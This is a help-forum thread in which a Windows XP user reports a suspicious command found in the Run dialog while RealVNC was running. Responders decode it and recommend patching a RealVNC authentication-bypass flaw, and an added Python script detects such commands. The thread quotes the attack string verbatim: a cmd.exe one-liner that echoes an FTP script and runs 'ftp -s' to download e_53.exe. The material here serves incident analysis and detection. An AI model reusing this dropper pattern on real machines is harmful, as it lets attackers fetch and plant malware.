Solved

Have I been hacked ?

Posted on 2006-11-02
Last Modified: 2013-12-04
When I returned to my Windows XP PC after leaving the (password protected) RealVNC server running, I saw the Run... window had been opened and it contained the following string:
cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i &echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e

What does the above mean, please?
Question by: EugeneGardner
6 Comments
 
LVL 9

Accepted Solution

by: FixingStuff (earned 40 total points)
Looks like there was a hack attempt. The command does the following:
Creates a file called i with the following contents:
open 127.0.0.1 31006
user 1 1
get e_53.exe
quit

Then it tries to run FTP using the above file as a script.

You are either wide open on the internet (no firewall) or have port forwarding to VNC, which will get port scanned constantly.
Recommendation: LOCK DOWN YOUR MACHINE ASAP. At least change the default port on VNC.

Go here and run ShieldsUP to check your open ports to the world.
www.grc.com

FS-
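For anyone who finds a similar string in a Run dialog, event log or EDR console, here is an added example (written for this thread, not code from any of the posters) that does mechanically what the accepted answer does by hand: it splits the cmd.exe chain on `&`, replays the `echo ... > file` / `echo ... >> file` redirects to rebuild the script file, finds the `ftp -s:` segment that consumes it, and reports the host, port, login and fetched file names. The function names (`split_chain`, `analyze_cmdline`, `is_ftp_dropper`) are my own; the sample input is the exact string from the question, including the cut-off trailing `&e`, which the parser reports as unrecognized rather than guessing what it was.

```python
"""Reconstruct an "echo-built" FTP script from a cmd.exe one-liner and flag it.

Example code added to this thread; not written by any of the posters.
"""
import re

# Constructed sample input: the exact string from the question, including the
# truncated trailing "&e" as it appeared in the Run dialog.
SAMPLE = ("cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i "
          "&echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e")

_CMD_PREFIX = re.compile(r"^\s*(?:cmd(?:\.exe)?\s+/[ckCK]\s+)?", re.I)
_ECHO = re.compile(r"^echo\s+(?P<text>.*?)\s*(?P<op>>>|>)\s*(?P<file>\S+)$", re.I)
_FTP = re.compile(r"^ftp\b.*?-s:(?P<file>\S+)", re.I)   # -s:file = script file
_DEL = re.compile(r"^(?:del|erase)\s+(?P<file>\S+)", re.I)


def split_chain(cmdline):
    """Split a cmd.exe command chain on '&' / '&&' into trimmed segments."""
    body = _CMD_PREFIX.sub("", cmdline, count=1)
    return [s.strip() for s in re.split(r"&&?", body) if s.strip()]


def analyze_cmdline(cmdline):
    """Replay echo redirects to rebuild the script, then read the FTP verbs."""
    files = {}  # file name -> lines the echo redirects would write into it
    report = {"deleted": [], "ftp_script_file": None, "script_lines": [],
              "host": None, "port": None, "user": None, "downloads": [],
              "unrecognized": []}
    for seg in split_chain(cmdline):
        if (m := _DEL.match(seg)):
            report["deleted"].append(m["file"])
        elif (m := _ECHO.match(seg)):
            lines = files.setdefault(m["file"], [])
            if m["op"] == ">":          # a single '>' truncates the file first
                lines.clear()
            lines.append(m["text"])
        elif (m := _FTP.match(seg)):
            report["ftp_script_file"] = m["file"]
        else:                            # e.g. the cut-off "e" at the end
            report["unrecognized"].append(seg)

    script = files.get(report["ftp_script_file"], [])
    report["script_lines"] = list(script)
    for line in script:                  # interpret the ftp.exe script verbs
        verb, *args = line.split()
        verb = verb.lower()
        if verb == "open" and args:
            report["host"] = args[0]
            report["port"] = int(args[1]) if len(args) > 1 and args[1].isdigit() else 21
        elif verb == "user" and args:
            report["user"] = args[0]
        elif verb in ("get", "mget", "recv") and args:
            report["downloads"].append(args[0])
    return report


def is_ftp_dropper(cmdline):
    """True when the chain builds an ftp -s: script in place and fetches a file."""
    r = analyze_cmdline(cmdline)
    return r["ftp_script_file"] is not None and bool(r["downloads"])


if __name__ == "__main__":
    import json
    print(json.dumps(analyze_cmdline(SAMPLE), indent=2))
```

Running it on the string from the question yields the same four-line script the accepted answer lists, host 127.0.0.1 on port 31006, login `1`, download `e_53.exe`, and one unrecognized fragment `e`. `is_ftp_dropper` only fires when a script file is assembled by redirects in the same chain and then fed to `ftp -s:` with a `get` in it, so ordinary `echo` redirects or an interactive `ftp` session do not match.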
 
LVL 1

Author Comment

by: EugeneGardner
Thanks.  GRC thinks I am secure (as I am behind a firewall).  My port 31006 is in 'stealth' mode.
I'm not sure how the Run... command was caused to be issued, as my RealVNC connection is password protected.  And where would the e_53.exe file be dropped?  I can't find it anywhere.  Another thing I don't understand is what the point of running a script like that would be.  There is no execute command!
 
LVL 9

Expert Comment

by: FixingStuff
Good that you are secure!
You probably should go back to GRC ShieldsUP and check port 5900.  Select the "lookup specific port information" button, enter 5900, then click the "Probe This Port" button. That is the default RealVNC port. I also suggest that you change the default to some other unique, unknown port. I don't know how they got past your password, but it looks like they did somehow. Again, change the default port, and you should probably change the password as well.
As far as what would be accomplished by the FTP script, I agree... it does not look like it would really do anything, especially if the e_53.exe does not exist on your system. It was probably just an attempt to prepare your machine to be a bot of some kind or allow it to be remotely controlled by a hacker.
FS-
 
LVL 21

Assisted Solution

by: briancassin (earned 20 total points)
This issue seems to be directly related to RealVNC.

How old is it?

There was a serious security flaw found back around May of this year. If you have not updated it, it may be that attackers are getting into your system because you are running an unpatched version of VNC.

Source: eWeek

A "highly critical" flaw in RealVNC's virtual network computing software could allow malicious hackers to access a remote system without a password, according to a published advisory. RealVNC, the Cambridge, U.K.-based company that invented the open-source software, has acknowledged the flaw and posted patches for all affected versions. The RealVNC software, which competes with Symantec's pcAnywhere, allows users to access a remote computer from a local PC. The company distributes the software in three versions—free, personal and enterprise edition. The vulnerability is caused by an error within the handling of VNC password authentication requests. It can be exploited to bypass authentication and allows access to the remote system without requiring knowledge of the VNC password.
 
LVL 1

Author Comment

by: EugeneGardner
Ahh - good point.  I'm running version 4.1.1.  I have just downloaded version 4.1.2.
Thanks.
 
LVL 9

Expert Comment

by: FixingStuff
Good find! I'm on 4.1.1 also. Guess it's time for an update, however, I only use VNC via VPN... very secure that way.
FS-